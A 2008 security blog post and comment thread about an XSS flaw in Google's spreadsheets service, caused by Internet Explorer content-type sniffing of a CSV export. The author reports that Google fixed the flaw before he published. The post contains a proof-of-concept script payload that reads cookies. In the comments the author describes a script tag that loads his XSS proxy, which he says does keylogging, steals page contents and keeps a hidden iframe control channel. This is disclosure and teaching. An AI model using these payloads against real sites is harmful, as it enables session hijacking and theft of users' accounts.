Monday, April 14th, 2008

Google XSS

Now, normally when I find an XSS vulnerability on a popular domain I just report it to the appropriate security team and move on, but this one is interesting…

By taking advantage of the content-type returned by (and a caching flaw on the part of Google), I was able to pull off a full blown XSS against the domain. For those of you who don’t understand what this means, allow me to elaborate. When Google sets their cookie, it is valid for all of their sub domains. So, when you log into gmail (, your gmail cookie is actually valid for,,…and so on. If someone (like me) finds an XSS vulnerability in any one of these sub domains, I’ll be able to hijack your session and access any google service as if I were you.

So, in this instance, I have an XSS on With this single XSS, I can read your Gmail, backdoor your source code (, steal all your Google Docs, and basically do whatever I want on Google as if I were you! Google’s use of “document.domain=” also make things a little easier to jump from one domain to the next, but that’s another story…

This particular XSS takes advantage of how Internet Explorer determines the content type of the HTTP response being returned by the server. Most would think that explicitly setting the content-type to something that isn’t supposed to be rendered by the browser would easily solve this issue, but it does not. IE isn’t the only browser that will ignore the content-type header in certain circumstances, Firefox, Opera, and Safari will ignore the content-type header as well (in certain circumstances). Security professionals and more importantly developers need to understand the nuances of how the popular web browsers handle various content-type headers, otherwise they may put their web application at risk of XSS. The most comprehensive paper I’ve seen on the subject was written by Blake Frantz of Leviathan. The paper can be found here. It’s a “MUST HAVE” reference for web app security pros. Read it, understand it, protect yourself appropriately or expect others to exploit appropriately…

In this issue, Google set the content-type header for a response which I controlled the content to text/plain. If I can inject what looks like HTML into the first few bytes of the response, I’ll be able to “trick” Internet Explorer into rendering the content as HTML. Luckily for me, I was able to do just that.

I created a spreadsheet on and for the first cell (A1) I put the following content: “<HTML><body><script>alert(document.cookie)</script></body></HTML>”

I then saved the spreadsheet and generated a link for the spreadsheet to be served as a CSV.


When this option is selected, the contents of the spreadsheet are displayed inline (the content-disposition header was not explicitly set to “attachment”), IE ignores the content-type header, sniffs the content-type from the response, then proceeds to render the response as if it were HTML. At this point, I control the entire HTML being rendered under an domain.


To be fair, Google included a subtle defense to protect against content-type sniffing (padding the response), but those protection measures failed (with a little prodding by me). The issue is fixed, but if you try to reproduce this issue, you’ll see their defense in play. It a solid defense which shows they understand the nuances of content-type sniffing.

I’ll provide some tips on taking ownership of untrusted content and serving it from your server in a later post, but for now take a look at the paper written by Blake Frantz. I’m sure it will open some eyes…

Posted by xssniper | Filed in Security, Web Application Security

  • Hans Nordhaug

    Very interesting (and scary) stuff, and I’ll read the article by Blake Frantz immediately. I have one suggestion that could have made this article even better for the curios, but lazy, of us – a description of the Google defense against the attack. I’ll of course go and test it myself now, but not everybody will.

  • kuza55

    That’s surprising since they fixed the issue on Gmail (by sending files as attachments), either the Gmail issue is a fluke or they don’t communicate security info between teams, which isn’t good…

  • Kishor

    Interesting. When I was talking with .mario some time ago about alerts I saw in solutions for XSS in eXceSS (, he told me about this behaviour of IE.

    At that time I tried it against gmail attachments, but there they had padding of first 256 blanks in the attachment. I don’t know why they forgot to do that in docs.

    Anyway, it was a good find.

  • Webpromotie

    Great find! Ur famous now. Did Google pay u something for finding a big leak? They should…

  • Pingback: .:Computer Defense:. » Interesting Links

  • Jim Manico

    So you bailed on responsible disclosure because it was interesting?

  • nixdude

    You don’t have to just use lynx or other text based browser, it’s only XSS. So, delete private data upon leaving every website if you don’t already have an automatic option like stealth browsing. I do it out of habit, since you have to have the session cookies in your cache to get infiltrated just delete authentication cookies as soon as you are about to leave the websites where you use login credentials.

  • Pingback: Gmail cookie stolen via Google Spreadsheets « IT Spot

  • Pingback: إمكانية سرقة الكوكيز لبريد قوقل عبر مستندات قوقل « KLadofoRA

  • ted

    Anyone could tell me a hyperlink to the paper written by Blake Frantz?

  • Mike Riversdale

    Top work … they now know and have stopped it?

  • xssniper

    @ Hans – Google used “padding” before the user controlled content. The padding prevents the browser from sniffing the content.

    @ Kuza55 – Agreed, content-disposition: attachment will stop this kind of attack cold in its tracks. Content-disposition will NOT help against flash crossdomain.xml or java applet attacks.

    @Kishor – The padding is a pretty solid defense against content-type sniffing. I need to look into whether it prevents crossdomain.xml and applet based attacks (insecure content ownership).

    @ Jim & Mike – I reported this issue to the Google Security Team and waited till they fixed it before talking about it on my blog. I’ve come across several XSS issues on major domains, but I usually don’t blog about them, even after they’ve been fixed.

    @ted –

  • Pingback: إغلاق ثغرة خطيرة في غوغل أوفيس

  • Pingback: WhatsMyProblem? - Allround themenblog

  • Pingback: Blog Web Technology news » Blog Archive » Gmail cookie stolen via Google Spreadsheets

  • Langy

    Good man!!!

    I have submit this news in Home of my portal

  • Pasini Mario

    Nice found.

  • Pingback: » News, Trauer, Nüsse & Bier | seoFM - der erste deutsche PodCast für SEOs und Online-Marketer

  • Laine

    And how could you exploit this XSS?

    When the user clicks your link he just gets that alert…

    Is it even possible to steal cookie this way?

  • xssniper

    @ Laine – WOW… haha.. I control the ENTIRE HTML on the page if you can’t think of how this would be exploited, you need to catch up with the rest of the world… seriously… the post was a “Proof of Concept”…

    To be fair, I guess there are still lots of people out there that don’t understand the full impact of XSS yet. I guess I could have pointed it at my XSS Proxy (XS-Sniper) via a script src tag

  • Philipp Lenssen

    We reported on this in 2007 without disclosing details* and also alerted Google security — do you know when they fixed this?


  • xssniper

    @ Philipp – Not sure on the exact date, I orginally showed the Google Security team the Proof of Concept on 31 March 2008 and it was fixed by the time I had my first beer with members of the GST at RSA… (aka BEFORE I wrote about it in my blog)

  • Laine

    Do you mean something like:



  • xssniper

    @ Laine – Why just steal the cookies when I can hijack the whole browser (and then steal the cookies)?

    <script src = “path-to-xssniper”></script> is the better way to go…

    if you’re confused, check out Anton Rager Shmoocon 2005 talk on XSS-Proxy. I’ve created my own XSS proxy (called XS-Sniper, which some people have seen at various security conferences), which is based off of Anton’s XSS-Proxy

    And NO.. I won’t give you XS-Sniper…. and those that already have a copy probably won’t give it to you either :p

  • Laine

    The whole browser? Like a telnet session with DOM?

  • xssniper

    @ Laine – There are a lot of sweet things you can do. My favorite piece of functionality I built into XS-Sniper is SniperScope, which basically steals the HTML off of the victims browser and ferries it back to the XSS Proxy. It basically allows me to “shoulder surf” the XSSd victim. Keylogging is pretty sweet to, especially when XS-Sniper automatically decodes the keycodes as they come in. We actually used these two features on a pen-test (back in my consulting days) with great success…

    The proxy follows the victim to each page (in the same domain), so if they decide to navigate elsewhere, I don’t have to worry about losing my control channel :)

  • Pingback: Zero Day mobile edition

  • Pingback: Another Reason To Ditch IE. As If We Didn’t Have Enough Already. « Media Junkie

  • Laine

    Holy smokes, xssniper! It got me all excited. I dreamed about this night and I want to be as skillful as you are.

    How does the following happen?

    Do all the urls get rewritten in some smart manner?

  • xssniper

    @ Laine – Actually no, the call to the “script src” is actually a call to a dynamic javascript generated by the XSS-Proxy, which creates three iframes. One iframe for the victim to see and navigate on, the other two are invisible and act as a control channel and payload passing mechanism. No URL rewrites are necessary.

  • Laine

    Amazing. One more question, does this method hijack the whole browser, or just that domain?

  • Pingback: Falha já corrigida no Google Apps permitia acesso a serviços do Google | Manoel Franklin

  • Pingback: Union Softwares - Blog » Falha já corrigida no Google Apps permitia acesso a serviços do Google

  • xssniper

    @ Laine – Getting that first XSS to execute it in the browser is the toughest, once that XSS has executed, you’re not necessarily tied to that domain anymore. The “Pope” and I spoke about this at Blackhat Europe last year…

    Kicking Down the Cross Domain Door:

  • Pingback: Shadow Security Blog » Detectan agujero de seguridad en Google Apps

  • Malte Landwehr

    This is a good example why “the online office” is not an alternative to current office software. It is just not safe.

  • Pingback: Revue de presse

  • Pingback: Web 2.0 Ideenklau! Oder bin nur ich paranoid? | Blogmillionär

  • Pingback: Google Health « NonaTheNinja

  • Lostmon

    Thanks for sharing some of your knowledge !!!

  • Murat ÇOLAk

    I find one xss too. and its on my page. www j2menedir com

  • Murat ÇOLAK
  • Pingback: GoogleBig » Blog Archive » XSS vulnerability found by Billy (BK) Rios in Google Spreadsheets

  • Pingback: Sicherheitslücke in Spreadsheets « GoogleWatchBlog WP Test